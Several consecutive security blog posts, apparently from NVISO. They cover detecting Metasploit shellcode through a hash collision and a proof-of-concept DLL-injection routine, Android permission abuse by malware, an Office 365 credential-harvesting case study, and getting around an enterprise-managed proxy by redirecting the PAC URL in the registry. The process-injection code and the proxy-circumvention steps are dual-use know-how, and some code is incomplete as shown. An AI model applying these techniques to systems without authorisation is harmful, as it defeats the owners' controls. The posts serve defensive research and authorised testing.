While walking the double-linked list could loop indefinitely, the shellcode will actually generate an “Access Violation” error once all modules have been checked. This exception is not generated explicitly by the shellcode but rather occurs as the code doesn’t verify the list’s boundaries. Given that for each item in the list the BaseDllName.Buffer pointer is loaded from offset 0x28, an exception will occur once we access the first non-LDR_DATA_TABLE_ENTRY item in the list. As shown in the figure below, this will be the case once the shellcode loops back to the first PEB_LDR_DATA structure, at which stage an out-of-bounds read will occur resulting in an invalid pointer being de-referenced.

Figure 21: An out-of-bounds read when walking the InMemoryOrderModuleList double-linked list.

Although from a defensive perspective causing a Denial of Service is better than having Metasploit shellcode execute, let’s see how one could further exploit the above flaw to the defender’s advantage.

Abusing CWE-1288 to Hijack the Execution Flow

One module of interest is kernel32.dll which, as previously analyzed in the “Execution Flow Analysis” section, is the first required module in order to call the LoadLibraryA function. During the hashing routine, the kernel32.dll hash is computed to be 0x92af16da. By applying the above buffer-resize technique, we can ensure the shellcode loops additional modules since the original hashes won’t match. From here, a security solution has a couple of options:

  • Our injected security solution’s DLL could be named kernel32.dll. While its hashes would match, having two modules named kernel32.dll might have unintended consequences on legitimate calls to LoadLibraryA.
  • Similarly, as we are already modifying buffers in LDR_DATA_TABLE_ENTRY structures, we could easily save the original values of the kernel32.dll buffer and assign them to our security solution’s injected module. While this would theoretically work, having a second buffer in memory called kernel32.dll isn’t a great idea as previously mentioned.
  • Alternatively, our security solution’s injected module could have a different name, as long as there is a hash-collision with the original hash. This technique won’t impact legitimate calls such as LoadLibraryA as these rely on value-based comparisons, as opposed to the shellcode’s hash-based comparisons.

We previously observed how the Metasploit shellcode performed hashing using additions and rotations on ASCII characters (1-byte). As a follow-up on figure 6, the following schema depicts the state of KERNEL32.DLL‘s hash on the third loop, where the ASCII characters K and E overlap. As one might observe, the NULL character is a direct consequence of performing 1-byte operations on what initially is a Unicode string (2-byte).

Figure 22: The first and third ASCII characters overlapping.

To obtain a hash collision, we need to identify changes which we can perform on the initial KERNEL32.DLL string without altering the resulting hash. The following figure highlights how there is a 6-bit relationship between the first and third ASCII character. By subtracting the second bit of the first character, we can increment the eighth bit (2+6) of the third character without affecting the resulting hash.

Figure 23: A hash collision between the first and third ASCII characters.

While the above collision is not practical (the ASCII or Unicode character 0xC5 is not within the alphanumeric range), we can apply the same principle to identify acceptable relationships. The following Python snippet brute-forces the relationships among Unicode characters for the KERNEL32.DLL string assuming we don’t alter the string’s length.

name = "KERNEL32.DLL\0"
for i in range(len(name)):
    for j in range(len(name)):
        # Avoid duplicates
        if j <= i:
        # Compute right-shift/left-shift relationships
        # We shift twice by 13 bits due to Unicode being twice the size of ASCII.
        # We perform a modulo of 32 due to the registers being, in our case,  32 bits in size.
        relation = ((13*2*(j-i))%32)
        if relation > 16:
            relation -= 32
        # Get close relationships (0, 1, 2 or 3 bit-shifts)
        if -3 <= relation <= 3:
            print(f"Characters at index {i} and {j:2d} have a relationship of {relation} bits")
# "Characters at index 0 and  5 have a relationship of 2 bits"
# "Characters at index 0 and 11 have a relationship of -2 bits"
# "Characters at index 1 and  6 have a relationship of 2 bits"
# "Characters at index 1 and 12 have a relationship of -2 bits"
# "Characters at index 2 and  7 have a relationship of 2 bits"
# "Characters at index 3 and  8 have a relationship of 2 bits"
# "Characters at index 4 and  9 have a relationship of 2 bits"
# "Characters at index 5 and 10 have a relationship of 2 bits"
# "Characters at index 6 and 11 have a relationship of 2 bits"
# "Characters at index 7 and 12 have a relationship of 2 bits"

As observed above, multiple character pairs can be altered to cause a hash collision. As an example, there is a 2-bit left-shift relation between the characters at Unicode position 0 and 11.

Given a 2-bit left-shift is similar to a multiplication by 4, incrementing the Unicode character at position 0 by any value requires decrementing the character at position 11 by 4 times the same value to keep the Metasploit hash intact. The following Python commands highlight the different possible combinations between these two characters for KERNEL32.DLL.

# The original hash (0x92af16da)
# "0x92af16da"
# Decrementing 'K' by 3 requires adding 12 to 'L'
# "0x92af16da"
# Decrementing 'K' by 2 requires adding 8 to 'L'
# "0x92af16da"
# Decrementing 'K' by 1 requires adding 4 to 'L'
# "0x92af16da"
# Incrementing 'K' by 1 requires substracting 4 from 'L'
# "0x92af16da"
# Incrementing 'K' by 2 requires substracting 8 from 'L'
# "0x92af16da"

This hash collision combined with the buffer-resize technique can be chained to ensure our custom DLL gets evaluated as KERNEL32.DLL in the hashing routine. From here, if we export a LoadLibraryA function, the Metasploit import resolution will incorrectly call our implementation resulting in an execution flow hijack. This hijack can be leveraged to signal the security solution about a high-confidence Metasploit import resolution taking place.

Building a Proof of Concept

To demonstrate our theory, let’s build a proof-of-concept DLL which will, once loaded, make use of CWE-1288 to simulate how an EDR (Endpoint Detection and Response) solution could detect Metasploit without prior knowledge of its in-memory location. As we want to exploit the above hash collisions, our DLL will be named hernel32.dlx.

The proof of concept has been published on NVISO’s GitHub repository.

The Process Injection

To simulate how a security solution would be injected into most processes, let’s build a simple function which will run our DLL into a process of our choosing.

The Inject function will trick the targeted process into loading a specific DLL (our hernel32.dlx) and execute its DllMain function from where we’ll trigger the buffer-resizing. While multiple techniques exist, we will simply write our DLL’s path into the target process and create a remote thread calling LoadLibraryA. This remote thread will then load our DLL as if the target process intended to do it.

Inject(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
    #pragma EXPORT
    int PID;
    HMODULE hKernel32;
    FARPROC fLoadLibraryA;
    HANDLE hProcess;
    LPVOID lpInject;

    // Recover the current module path
    char payload[MAX_PATH];
    int size;
    if ((size = GetModuleFileNameA(hPayload, payload, MAX_PATH)) == NULL)
        MessageBoxError("Unable to get module file name.");
    // Recover LoadLibraryA 
    hKernel32 = GetModuleHandle(L"Kernel32");
    if (hKernel32 == NULL)
        MessageBoxError("Unable to get a handle to Kernel32.");
    fLoadLibraryA = GetProcAddress(hKernel32, "LoadLibraryA");
    if (fLoadLibraryA == NULL)
        MessageBoxError("Unable to get LoadLibraryA address.");

    // Open the processes
    PID = std::stoi(lpszCmdLine);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    if (!hProcess)
        char message[200];
        if (sprintf_s(message, 200, "Unable to open process %d.", PID) > 0)

    // Allocated memory for the injection
    lpInject = VirtualAllocEx(hProcess, NULL, size + 1, MEM_COMMIT, PAGE_READWRITE);
    if (lpInject)
        wchar_t buffer[100];
        wsprintfW(buffer, L"You are about to execute the injected library in process %d.", PID);
        if (WriteProcessMemory(hProcess, lpInject, payload, size + 1, NULL) && IDCANCEL != MessageBox(NULL, buffer, L"NVISO Mock AV", MB_ICONINFORMATION | MB_OKCANCEL))
            CreateRemoteThread(hProcess, NULL, NULL, (LPTHREAD_START_ROUTINE)fLoadLibraryA, lpInject, NULL, NULL);
            VirtualFreeEx(hProcess, lpInject, NULL, MEM_RELEASE);
        char message[200];
        if (sprintf_s(message, 200, "Unable to allocate %d bytes.", size+1) > 0)

As one might notice, the above code relies on the hPayload variable. This variable will be defined in the DllMain function as we aim to get the current DLL’s module regardless of its name, whereas GetModuleHandleA would require us to hard-code the hernel32.dlx name.

HMODULE hPayload;

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    switch (ul_reason_for_call)
        hPayload = hModule;
    return TRUE;

With our Inject method exported, we can now proceed to build the logic needed to trigger CWE-1288.

The Buffer-Resizing

Resizing the BaseDllName buffer from the kernel32.dll module can be accomplished using the logic below. Similar to the shellcode’s technique, we will recover the PEB, walk the InMemoryOrderModuleList and once the KERNEL32.DLL module is found, increase its buffer by 1.

Metasplop() {
    PPEB pPeb = NULL;
    PPEB_LDR_DATA pLdrData = NULL;
    PLIST_ENTRY pHeadEntry = NULL;
    PLIST_ENTRY pEntry = NULL;
    USHORT MaximumLength = NULL;

    // Read the PEB from the current process
    if ((pPeb = GetCurrentPebProcess()) == NULL) {
        MessageBoxError("GetPebCurrentProcess failed.");

    // Get the InMemoryOrderModuleList
    pLdrData = pPeb->Ldr;
    pHeadEntry = &pLdrData->InMemoryOrderModuleList;

    // Loop the modules
    for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink) {
        pLdrEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList);
        // Skip modules which aren't kernel32.dll
        if (lstrcmpiW(pLdrEntry->BaseDllName.Buffer, L"KERNEL32.DLL")) continue;
        // Compute the new maximum length
        MaximumLength = pLdrEntry->BaseDllName.MaximumLength + 1;
        // Create a new increased buffer
        wchar_t* NewBuffer = new wchar_t[MaximumLength];
        wcscpy_s(NewBuffer, MaximumLength, pLdrEntry->BaseDllName.Buffer);
        // Update the BaseDllName
        pLdrEntry->BaseDllName.Buffer = NewBuffer;
        pLdrEntry->BaseDllName.MaximumLength = MaximumLength;

This logic is best triggered as soon as possible once injection occurred. While this could be done through a TLS hook, we will for simplicity update the existing DllMain function to invoke Metasplop on DLL_PROCESS_ATTACH.

HMODULE hPayload;

                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
    switch (ul_reason_for_call)
        hPayload = hModule;
    return TRUE;

The Signal

As the shellcode we analyzed relied on LoadLibraryA, let’s build an implementation which will simply raise the Metasploit alert and then terminate the current malicious process. The following function will only be triggered by the shellcode and is itself never called from within our DLL.

LoadLibraryA(_In_ LPCSTR lpLibFileName)
    #pragma EXPORT
    // Raise the error message
    char buffer[200];
    if (sprintf_s(buffer, 200, "The process %d has attempted to load \"%s\" through LoadLibraryA using Metasploit's dynamic import resolution.\n", GetCurrentProcessId(), lpLibFileName) > 0)
    // Exit the process

The above approach can be performed for other variations such as LoadLibraryW, LoadLibraryExA and others.

The Result

With our emulated security solution ready, we can proceed to demonstrate our technique. As such, we’ll start by executing Shellcode.exe, a simple shellcode loader (show on the left in figure 24). This shellcode loader mentions its process ID (which we’ll target for injection) and then waits for the shellcode path it needs to execute.

Once we know in which process the shellcode will run, we can inject our emulated security solution (shown on the right in figure 24). This process is typically performed by the security solution for each process and is merely done manually in our PoC for simplicity. Using our custom DLL, we can inject into the desired process using the following command where the path to hernel32.dlx and the process ID have been picked accordingly.

# rundll32.exe <dll_path>,Inject <target_pid>
rundll32.exe C:\path\to\hernel32.dlx,Inject 6780
Figure 24: Manually emulating the AV injection into the future malicious process.

Once the injection is performed, the Shellcode.exe process has been staged (module buffer resized, colliding DLL loaded) for exploitation of the CWE-1288 weakness should any Metasploit shellcode run. It is worth noting that at this stage, no shellcode has been loaded nor has there been any memory allocation for it. This ensures we comply with the assumption that we don’t know where shellcode is executing.

With our mock security solution injected, we can proceed to provide the path to our initially generated shellcode (shellcode.vir in our case) to the soon-to-be malicious Shellcode.exe process (left in figure 25).

Figure 25: Executing the malicious shellcode as would be done by the stagers.

Once the shellcode runs, we can see how in figure 26 our LoadLibraryA signalling function gets called, resulting in a high-confidence detection of shellcode-based import resolution.

Figure 26: The input-validation flaw and hash collision being chained to signal the AV.


As a matter of courtesy, NVISO delayed the publishing of this blog post to provide Rapid7, the maintainers of Metasploit, with sufficient review time.


This blog post highlighted the anatomy of Metasploit shellcode with an additional focus on the dynamic import resolution. Within this dynamic import resolution we further identified two weaknesses, one of which can be leveraged to identify runtime Metasploit shellcode with high confidence.

At NVISO, we are always looking at ways to improve our detection mechanisms. Understanding how Metasploit works is one part of the bigger picture and as a result of this research, we were able to build Yara rules identifying Metasploit payloads by fingerprinting both import hashes and average distances between them. A subset of these rules is available upon request.

How malicious applications abuse Android permissions

1 September 2021 at 15:07


Many Android applications on the Google Play Store request a plethora of permissions to the user. In most cases, those permissions are actually required by the application to work properly, even if it is not always clear why, while other times they are plainly unnecessary for the application or are used for malicious purposes.

In a world where the user’s privacy is becoming one of the primary concerns on the internet, it is important for the users to understand the permissions each application is requesting and to determine whether or not the application really needs it.

In this blog post, we will go over what exactly these permissions are, and we will illustrate legitimate permission usages as well as several illegitimate permission usages. We hope that this blog post will help the reader understand that blindly granting permissions to an application can have a severe impact on their privacy or even wallet.

What are application permissions

If developers want their application to perform a sensitive action, such as accessing private user data, they have to request a specific permission to the Android system. The system will then automatically grant the permission to the application if the permission was already granted before, or the user will be shown a dialog asking for the user to grant the permission. Each granted permission allows the application to perform a specific action. For example, the permission android.permission.READ_EXTERNAL_STORAGE grants read access to the shared storage space of the device.

By default, Android applications do not have any permissions that allow them to perform sensitive actions that would have an impact on the user, the system or other applications. This includes accessing the local storage outside of the application container, accessing the user’s messages or accessing sensitive device information.

The Android operating system differentiates three types of permissions: normal permissions, signature permissions and dangerous permissions.

Normal permissions grant access to data and resources outside of the application sandbox which have very little risk to compromise user’s data or other applications on the system. Normal permissions declared in the application’s manifest are automatically granted upon installing the application on the device. Users do not need to grant these permissions and cannot revoke them. The android.permission.INTERNET permission, allowing the application to access the internet, is an example of normal permission.

Signature permissions grant access to custom permissions declared by an application signed with the same certificate as the requesting application. These permissions are granted automatically by the system upon installation. Users do not need to grant those permissions and cannot revoke them.

Dangerous permissions grant access to data and resources outside of the application sandbox which could have an impact on the user’s data, the system or other applications. If an application requests a dangerous permission in its manifest, the user will have to explicitly grant the permission to the application. On devices running Android 6.0 (API level 23) or above, the application has to request the permission to the user at runtime through a prompt. The user can then choose to allow or deny the permission. The user can later revoke any granted permissions in the settings of the application, in the device settings. On devices running Android 5.1.1 (API level 22) and older, the system will ask the user to grant all the dangerous permissions during installation. If the user accepts, all the permissions will be given to the application. Otherwise, the installation of the application will be cancelled. The android.permission.ACCESS_FINE_LOCATION permission, allowing the application to access the precise location of the device, is an example of a dangerous permission.

Permissions to be granted at install time in Android 5.1.1 and older
Permissions to be granted at runtime in Android 6.0 and above

Android maintains a list of all the permissions and their protection level.

Legitimate permissions usage

While permissions can be dangerous as it allows the applications to access sensitive data or resources, permissions are also essential for many features of a regular application. For example, the Google Map application would not be able to work as intended if it was not granted permission to access the location of the device.

In this section, we will quickly go over a few permissions that are needed for an application to work properly. You will see that while most of the time the reason of the permission is obvious, it may sometimes not be clear why at all.

Let’s start with a basic example: KMI Weather, a Belgian weather application.

The KMI Weather application (version 2.8.8) declares the following standard permissions in its manifest:

  • android.permission.ACCESS_COARSE_LOCATION
  • android.permission.ACCESS_FINE_LOCATION
  • android.permission.ACCESS_NETWORK_STATE
  • android.permission.INTERNET
  • android.permission.WAKE_LOCK
  • android.permission.VIBRATE

The ACCESS_COARSE_LOCATION and ACCESS_FINE_LOCATION permissions are dangerous permissions used by the application to automatically fetch the weather data for the current city the device is in. The other permissions (ACCESS_NETWORK_STATE, Internet and WAKE_LOCK) are normal permissions and are therefore granted automatically by the system.

We can see in this first basic example that each requested permission has an obvious purpose for the application. However, this does not mean that the application will not misuse these permissions, as we will see in the next section.

In some cases, it is not clear why an application would request a permission. Let’s take for example the well-known Spotify application.

The Spotify application (version requests the following permission in its manifest: android.permission.READ_PHONE_STATE. The permission allows the application to access the phone number, the device IDs, whether a call is active, and the remote number calling the device. Since Spotify is an application to listen to music, why on earth would it need such a permission?

As previously stated, the READ_PHONE_STATE permission allows the application to know whether a call is active or not. This is used by Spotify to pause the music when a call is received by the application, since users would not be happy if the music kept playing while they answer a phone call. In addition, the permission allows the retrieval of the device IDs, which are used by many applications for device binding and analytics purposes.

As was shown in the previous example, applications will sometimes request permissions which don’t appear to make sense in their context at first glance, but which are actually very useful for the application and the user’s experience.

The main problem with many permissions is that they cover many different functionalities. From the user’s perspective, it’s often very difficult to know what exactly a specific permission is used for. The Android team recognized this shortcoming and introduced a new API that allows the developer to explain why a specific permission is requested. This dialog can be shown before the user is asked for the permission:

Dialog explaining why the location permissions is needed by the Twitter application

In addition to the explanation, Android regularly fine-tunes their permissions to prevent confusion. For example, the permission READ_CONTACTS originally also allowed the application to access the call and message logs. This was changed in Android 4.1, where new permissions were added and the READ_CONTACT permission no longer gave access to the call and message logs.

Unfortunately, applications sometimes also request permissions which plainly do not make sense for the application or which are used ill-intentionally, as we will highlight in the next section.

Malicious permissions usage

In the previous section, we saw that applications sometimes request permissions which you would not think they would need at first glance while they have, in fact, a perfectly good reason to request them.

In this section, we will explore the other side of requesting permissions: malicious usage of permissions. We will explore four different scenarios, using real-world examples.

Data collections

The first scenario we will explore is probably the one most people have in mind when an application requests many permissions which don’t appear to make sense for the application: An application harvesting data about its users.

We will illustrate this scenario by using a well-known social media application, Facebook.

It is common knowledge that Facebook harvests data about its users for advertising purposes. The data collected by Facebook ranges from personal information you provided to the platform to call logs history and details about SMS. Here, we will focus on how Facebook gathered the latter.

Just like any other Android application, the Facebook application has to request permissions in order to access the data and resources outside of the application sandbox. If we take a close look at the permissions requested by an older version of the Facebook Lite application, we will see, among others, the following permissions: READ_SMS and READ_CALL_LOG. The first permission allows the application to get details about the SMS messages that were sent and received, and the second permission allows the application to retrieve the call history of the device. While the READ_SMS permission could potentially be used to get multi-factor authentication codes, or to allow the application to act as an SMS application, these permissions also allows a lot of personal data to be collected by the application.

You might think that this is easily resolved as you can just revoke the permission or not grant it in the first place, but before Android 6.0 this was not possible. If you wanted to have an application, you needed to grant all the requested permissions. As for later versions of Android, while it is indeed possible to not grant such permissions, many users will blindly grant them due to ignorance of the consequences or simply out of convenience. Some applications may even refuse to work without the specific permission.

In addition to the above, Facebook uses an alternative way of collecting user data: other applications. There are many instances of applications sharing data with Facebook. Should you grant a sensitive permission to such an application, your data might be shared with Facebook even if you carefully denied the related permissions to Facebook in the first place. As shown by a report from Privacy International, many applications share data they have on you with Facebook., by using the Facebook SDK.

Collecting data for advertising purposes is arguably a malicious usage of application permissions. Whether you’re against this kind of practice or not, it’s easy to agree that collecting such amount of data even for legitimate purposes poses a threat to the user’s privacy and might even impact entire communities. A great example of this is the Facebook-Cambridge Analytica data scandal, where sensitive user’s data was leaked and supposedly used to influence elections.

Note that in the case of Facebook, their business model entirely relies on this data collection and on sharing it with advertisers, which is now public knowledge. In addition, most permissions requested by Facebook are tied to features of their applications. For example, as already mentioned, the READ_SMS permission allows Messenger to be used as an SMS application, while having access to the location allows Facebook to link your images to specific locations, or to share your location with your friends if you want to.

There are many other applications, such as adware, which operate in a similar way, but arguably with more malicious intentions. Such applications will typically request a lot of permissions which will be used to gather data about the user, that will be shared with advertising networks in order to show highly targeted advertisements. More often than not, the requested permissions will have no other purpose than to gather data about the user.

Malware-like applications

The second scenario we will take a look at is applications requesting many permissions and using them to exploit the user or the device.

A good example of this is the Joker malware. Joker will subscribe the user to paid services without the user’s consent by leveraging dangerous permissions granted to the application. This is obviously not something you would want as you will get charged for a service to which you subscribed unknowingly.

The Joker malware will request the READ_PHONE_STATE permission to obtain the user’s phone number and then uses it to initiate subscriptions to paid services. Usually, the paid services will require a confirmation code sent to the provided phone number. The malware will therefore also request the READ_SMS permission to retrieve the confirmation code from the received SMS and ultimately confirm the subscription. The user will then be charged monthly for the service. You can take a look at the in-depth analysis of Joker for more information

This is far from the only example of how permissions could be used maliciously. Another example would be an application that requests the SEND_SMS permission and send SMS to premium numbers (i.e. FakeInst), or an application accessing the SD Card and exfiltrating documents of the user. Other malware-like applications will ask for very limited permissions and rely on those to exploit other legitimate applications with more extensive permissions to perform their malicious actions.

Luckily, Google usually reacts quickly to such applications and removes them from the Google Play Store, preventing further victims of such applications. However, despite their fast reactions, many users will have already downloaded the malicious applications and fall victim to them.

Abuse in legitimate permissions

In this third scenario, we will take a closer look at applications which do require specific permissions to work properly, but which will also abuse said permissions in ways that would not be expected from the users.

An example of such application would be an SMS application, requiring the permissions to read and send SMS, which abuses its permissions to send SMS to premium numbers or to intercept multi-factor authentication tokens, as discussed in this article. The read and send SMS permissions are legitimate permissions for an SMS application, the users will therefore naturally grant such permissions. However, the users do not expect the application to misuse these permissions the way it does, making the user pay for services they never subscribed to, or retrieve data allowing the malicious actor to access accounts of the user.

In such a scenario, the only thing the user can really do to protect their privacy is to stop using the application. This is however not something you would want every time as the application in question may be extremely convenient for the users. The choice then boils down to whether or not the user is willing to sacrifice their privacy to enjoy the convenience of the application.

In practice, such applications are not so common. Most of the time, malicious applications will rather request many permissions, even if they are not legitimate permissions for the application. In addition, malware rarely put a significant effort in having an application that appears to be legitimate. Instead, they will typically invest in hiding the application to the eyes of the user, or provide very limited feature and attempt to hide their malicious behavior in some other ways.

Abusing permissions of other applications

The last example of malicious usage of permissions is that of a malicious application which will abuse the permissions of a legitimate application on the device by exploiting its exposed features.

If a legitimate application requests dangerous permissions and then exposes a feature that uses that dangerous permission to the system, it allows any other application installed on the device to enjoy the permission without the need of requesting it. Let’s take for example a file explorer application with the permission to read files on the external storage. If it also exposes a provider that lets another application request the content of a given folder or file, it essentially allows the other applications to read files on the local storage, even if they do not have the READ_EXTERNAL_STORAGE permission. This is known as the Confused deputy problem.

A good example of this issue would be the Google and Samsung Camera applications which were identified vulnerable to such an attack in 2019. The applications exposed an unprotected feature that allowed another application to take pictures or videos through the Camera application. These pictures were written to the SD card, which is typical for Camera applications. A malicious application could request access to the user’s SD card, something that’s not suspicious by itself, send an Intent to the vulnerable app and then extract those images. Even worse, if Geolocation was enabled while taking the pictures, the application could extract that information from the image and essentially track the user without needing the LOCATION permission.

Google Camera application

Unfortunately for the users, there’s nothing that can be done to prevent these kinds of issues, apart from hoping that the developers correctly protected any exposed features of their application.


Application permissions are essential for almost every application to work properly. However, as we saw in this blog post, the permissions can also be abused to collect data or to create malware applications. It is therefore important for the users to be able to tell when a permission makes sense for an application and when it does not.

Developers should provide the users with a clear reason on why the application requests the permissions it does in order to help the decision of the user. However, even when this is the case, legitimate permissions on legitimate applications can be misused and the decision of the user comes down to whether or not the user is willing to risk his privacy for the convenience of using the application as it is intended.

About the authors

Simon Lardinois
Simon Lardinois

Simon Lardinois is a Security Consultant in the Software and Security assessment team at NVISO. His main area of focus is mobile application security, but is also interested in web and reverse engineering. In addition to mobile applications security, he also enjoys developing mobile applications.

Jeroen Beckers
Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

Credential harvesting and automated validation: a case study

26 August 2021 at 08:41

During our incident response engagements, we very frequently come across phishing lures set up to harvest as many credentials as possible, which will likely be sold afterwards or used in follow-up attacks against an organization (or both). While many of these credential harvesting attacks follow the same pattern, from time to time we stumble upon something new.

Over the last few months we worked on several phishing incidents that followed the next pattern:

  1. Phishing mail received by user where the sender is a known contact (who was compromised earlier)
  2. Phishing mail contains link to WeTransfer website where an HTML page can be downloaded
  3. HTML page displays Microsoft Office 365 login page
  4. User enters username and credentials
  5. Upon clicking the “Sign In” button, a script sends the entered username and credentials to a PHP page hosted on a likely compromised website
  6. The credentials are automatically checked for validity
  7. User always receives an error message “Incorrect password, verify your 365 password and sign in again”

While the majority of this attack seems to be rather standard, the automatically checking of passwords by the script on the compromised website is something we did not see before.

Detailed description of the credential harvesting attack

The initial phishing mail is sent to the user from a trusted source, someone they have interacted with before. This is something we see happening very frequently in these credential harvesting type of attacks: once attackers gain access to the mailbox of a user, they will send a new phishing mail to all users in the “Suggested Contacts” list (this list contains the e-mail addresses of people who you interacted with before). This creates a sense of legitimacy with the recipient of the phishing mail as it is coming from someone who they know and have interacted with before.

The phishing mails themselves are typically tailored to resemble an invoice or document from the sender company (containing the company name in the subject). The body of the e-mail however is not that spectacularly well crafted and typically only contains a reference to the document to be downloaded from an online portal or, as it was the case here, to a file sharing platform.  

From the file sharing platform, the user can download the attachment, in this example, this was an HTML Page where the name of the file contained the company name of the (compromised) sender of the phishing mail.

HTML page download from WeTransfer

After downloading and opening  the HTML page, the targeted user would receive a login screen for Office 365 – a screen we are all familiar with:

Local phishing HTML page

Interesting to note here is that this is a static page: if your organization has configured to show your company logo on the authentication screen following you entering your e-mail address, this is not taken into account in this phishing example.

Local phishing page – password entry

So far, this looks to be fairly standard for a credential harvesting attack, when clicking the “Sign In” button, a script is used to send the entered username and password to a PHP page on a (likely compromised) server:

Script sending credentials to PHP script

Irrelevant of whether or not the user entered the correct or incorrect credentials, the phishing form would always display that incorrect credentials are entered

Failed authentication is always shown

Now, looking into our Office 365 authentication logs, we would immediately see that someone tried to authenticate as the user that entered the credentials in the phishing form. This authentication attempt is happening immediately once you click the Sign In button on the local HTML phishing page, indicating there is no human interaction.

Authentication attempts logged in Office 365 authentication logs
Authentication details

As an attack like this could potentially also be used to bypass multi-factor authentication (authentication is performed from another system using the information provided by the user), we set-up a test account on which MFA was enabled (with no support for legacy authentication protocols). A quick test showed that the attackers did not implement a fallback mechanism that would allow them to pass along the MFA code as well.

Authentication faillure with MFA enabled
Authentication details

A few interesting observations to this attack:

  • The authentication attempt happens instantly, there is no human interaction
  • The IP address from where the authentication is performed is the IP address of the likely compromised website where the PHP script is hosted to which the username and credentials are posted
  • The authentication attempt is performed via IMAP4 with User Agent “BAV2ROPC” (a legacy protocol is used here, likely in an attempt to bypass multi-factor authentication)
  • It appears that the script on the likely compromised server maintains a key,value pair of previously entered credentials, the script will only attempt authentication with the same username and password once. When entering a new password for the same e-mail address, another authentication attempt will be performed. This is likely done to avoid too many failed authentication attempts showing up in the logs or locking out the user.

Key takeaways

Attackers who are after credentials are, just like our defenses, constantly evolving. In an attack like this one, where credentials are automatically checked via a script, the attacker does not need to be present all the time, but can come back to the compromised web server they are abusing and collect a list of usernames and passwords which are verified to be correct.

It is highly recommended to enable multi-factor authentication on your user accounts and deny legacy authentication protocols from being accepted by your Office 365 infrastructure. In the majority of cases handled related to phishing, the attack would have been unsuccessful if MFA was enabled.

Michel Coene
Michel Coene

Michel is a senior manager at NVISO where he is responsible for our CSIRT services with a key focus on incident response, digital forensics, malware analysis and threat intelligence.

Proxy managed by enterprise? No problem! Abusing PAC and the registry to get burpin’

17 August 2021 at 14:25

As penetration testers, we sometimes have to perform web application security assessments from our customer’s computers instead of our beloved machines. When this happens, we can face different challenges in order to have a working test setup. We will most probably have very limited permissions, which can block us from installing applications or modifying proxy settings. We recently encountered such a situation during an engagement and we wanted to share our solution.

This blog post shows how you can still proxy a target application through Burp even if the proxy settings are managed by the enterprise.

That’s easy! We just use Burp’s internal browser!

You are absolutely correct! Burp introduced an internal browser in 2020 which is automatically preconfigured with the correct proxy settings. Problem solved! Install Burp, launch the browser and you’re good to go.

However, what if that’s not possible? When you receive a customer’s computer, you can be pretty sure you won’t be able to install Burp through the installer since you’re typically not allowed to run executables or to install applications. Luckily, Burp has a standalone version as well, which only requires Java. So a quick Java check later, and we’re good to go, right?

Checking Java Version

Well, no. In this case, Java is installed, but the Java version is too old to support a recent version of Burp with a built-in browser. We can still use an older version of Burp, but we will have to find an alternative solution to our proxy settings problem. There are various ways to configure a proxy, so let’s take a look.

Common proxy settings

Several possibilities exist to proxy traffic through Burp. Normally, you could simply modify the system’s proxy settings and these settings would automatically be picked up by Edge and Chrome. However, in our setup, this is unfortunately not possible because the settings are managed by the enterprise:

System Proxy Settings

The proxy settings are set in the Automatic proxy setup section, by using a PAC setup script. As the proxy settings are managed by the organization, we cannot edit them, and without admin privileges we cannot modify the local group policy to grant us access to the system proxy settings.

An alternative solution is to use Firefox’s built-in proxy settings. Firefox actually has their own settings panel where you can choose to either use system settings or configure a proxy yourself. Firefox was installed on the system, so we thought the end was in sight:

Greyed-Out Firefox Proxy Settings

Weirdly enough, Firefox doesn’t allow us to modify the proxy settings either. It appears it is possible to limit access to some Firefox settings by making use of a lock preferences file, located in the installation folder for Firefox:

Firefox Local Settings Location
local-settings.js Content
Snapshot of mozilla.cfg

As these files are all located in the installation folder of Firefox, in Program Files, admin privileges are required to edit these settings. Again, we ended up blocked and unable to change any of the proxy settings, either system wide or in Firefox itself.

Un-PAC-ing the mystery behind system proxy settings

As these two easy solutions were unsuccessful, let’s analyze more in depth how the actual system proxy settings work and what could possibly go wrong with it.

In the system proxy settings, we had seen it was using Automatic proxy setup, delivered via a PAC file through HTTP. What if we manage to deliver a modified PAC file, one with our own proxy settings?
First things first, let’s download the original PAC file and take a look. The PAC file is a simple text file and we can change the default proxy settings to our Burp IP and port:

Altered PAC File

We now need to make the system download our PAC file instead of the one set by the organization.

The URL for the PAC file is shown in the system proxy settings, but where is this URL actually stored? Most probably in a registry key! By searching for the URL of the PAC file inside the registry editor, we can see some hits. One of the hits was found in the Internet Settings, which seems like a very good candidate. And even better, these keys can be edited without admin rights! This means we can modify it to anything we want, so why not setting it to something like file://C:\temp\BR-Proxy.pac?

Some online research showed it would not be handled by the Internet Settings. It appears Internet Settings are using WinHttp proxy service to retrieve the file stored at the AutoConfigURL, which means protocols such as ftp:// or file:// are not supported. Therefore, only http:// or https:// protocols can be used.

So let’s set the variable to a local address, such as http꞉//

PAC File URL Registry Key

As a result of this modification, we can now see the system proxy has a script address set to the one we have set in the registry key:

Altered System Proxy Settings

We have changed the URL of the automatic setup to a URL we can potentially control. We now need a local server that will deliver our custom PAC over HTTP. As Java is installed on the system, a quick online search gives us a simple HTTP Java WebServer (https://github.com/pciporin25/Simple-HTTP-Server/blob/master/WebServer.java) to serve our PAC file on http꞉//

import java.net.*;
import java.io.*;
import java.nio.file.*;
import java.nio.charset.*;

public class WebServer {
public static void main (String args[])
                int serverPort = 8080;
                ServerSocket listenSocket = new ServerSocket(serverPort);

                System.out.println("Server listening on port 6880...");

                while(true) {
                        Socket clientSocket = listenSocket.accept();
                        InputStream input = clientSocket.getInputStream();
                        BufferedReader br = new BufferedReader(new InputStreamReader(input));

                        String request = br.readLine();
                        String[] reqArray = request.split(" "); // ['GET', 'index.html', 'HTTP/1.1']

                        String filePath = reqArray[1].substring(1); // index.html (or other path): remove the '/'
                        //System.out.println("request[0]: " + request[0] + " request[1]: " + request[1] + " nextline: " + nextLine);
                        if (filePath!=null)
                                loadPage(clientSocket, filePath, br);
        catch(IOException e) {
